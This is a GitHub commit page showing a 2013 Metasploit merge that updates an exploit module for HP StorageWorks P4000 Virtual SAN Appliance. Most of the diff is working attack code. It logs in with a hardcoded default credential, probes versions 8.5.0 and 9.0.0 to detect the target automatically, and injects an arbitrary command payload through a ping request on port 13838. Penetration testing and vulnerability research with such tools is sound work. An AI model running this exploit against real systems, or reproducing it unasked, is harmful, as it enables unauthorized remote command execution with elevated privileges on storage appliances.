Permalink
Browse files

Merge branch 'hp_vsa_exec_9' of github.com:jvazquez-r7/metasploit-fra…

…mework into jvazquez-r7-hp_vsa_exec_9
  • Loading branch information...
2 parents 189558b + 221ce22 commit 37634a9e60511b1f3651f6077ed5c70d83be37ee @sinn3r sinn3r committed Feb 19, 2013
Showing with 43 additions and 8 deletions.
  1. +43 −8 modules/exploits/multi/misc/hp_vsa_exec.rb
@@ -17,7 +17,7 @@ def initialize(info={})
'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
'Description' => %q{
This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on
- versions prior to 9.5. By using a default account credential, it is possible
+ versions prior to 9.5. By using a default account credential, it is possible
to inject arbitrary commands as part of a ping request via port 13838.
},
'License' => MSF_LICENSE,
@@ -50,9 +50,11 @@ def initialize(info={})
'Arch' => ARCH_CMD,
'Targets' =>
[
- ['HP VSA prior to 9.5', {}]
+ [ 'Automatic', {} ],
+ [ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ],
+ [ 'HP VSA 9', { 'Version' => '9.0.0' } ]
],
- 'Privileged' => false,
+ 'Privileged' => true,
'DisclosureDate' => "Nov 11 2011",
'DefaultTarget' => 0))
@@ -75,20 +77,53 @@ def generate_packet(data)
pkt
end
+ def get_target
+ if target.name !~ /Automatic/
+ return target
+ end
- def exploit
- connect
-
- # Login packet
- print_status("#{rhost}:#{rport} Sending login packet")
+ # Login at 8.5.0
packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")
+ print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")
+ sock.put(packet)
+ res = sock.get_once
+ vprint_status(Rex::Text.to_hex_dump(res)) if res
+ if res and res=~ /OK/ and res=~ /Login/
+ return targets[1]
+ end
+
+ # Login at 9.0.0
+ packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")
+ print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")
sock.put(packet)
res = sock.get_once
vprint_status(Rex::Text.to_hex_dump(res)) if res
+ if res and res=~ /OK/ and res =~ /Login/
+ return targets[2]
+ end
+
+ fail_with(Msf::Exploit::Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'")
+ end
+
+ def exploit
+ connect
+
+ if target.name =~ /Automatic/
+ my_target = get_target
+ print_good("#{rhost}:#{rport} - Target #{my_target.name} found")
+ else
+ my_target = target
+ print_status("#{rhost}:#{rport} Sending login packet")
+ packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")
+ sock.put(packet)
+ res = sock.get_once
+ vprint_status(Rex::Text.to_hex_dump(res)) if res
+ end
# Command execution
print_status("#{rhost}:#{rport} Sending injection")
data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"
+ data << "64/5/" if my_target.name =~ /9/
packet = generate_packet(data)
sock.put(packet)
res = sock.get_once

0 comments on commit 37634a9

Please sign in to comment.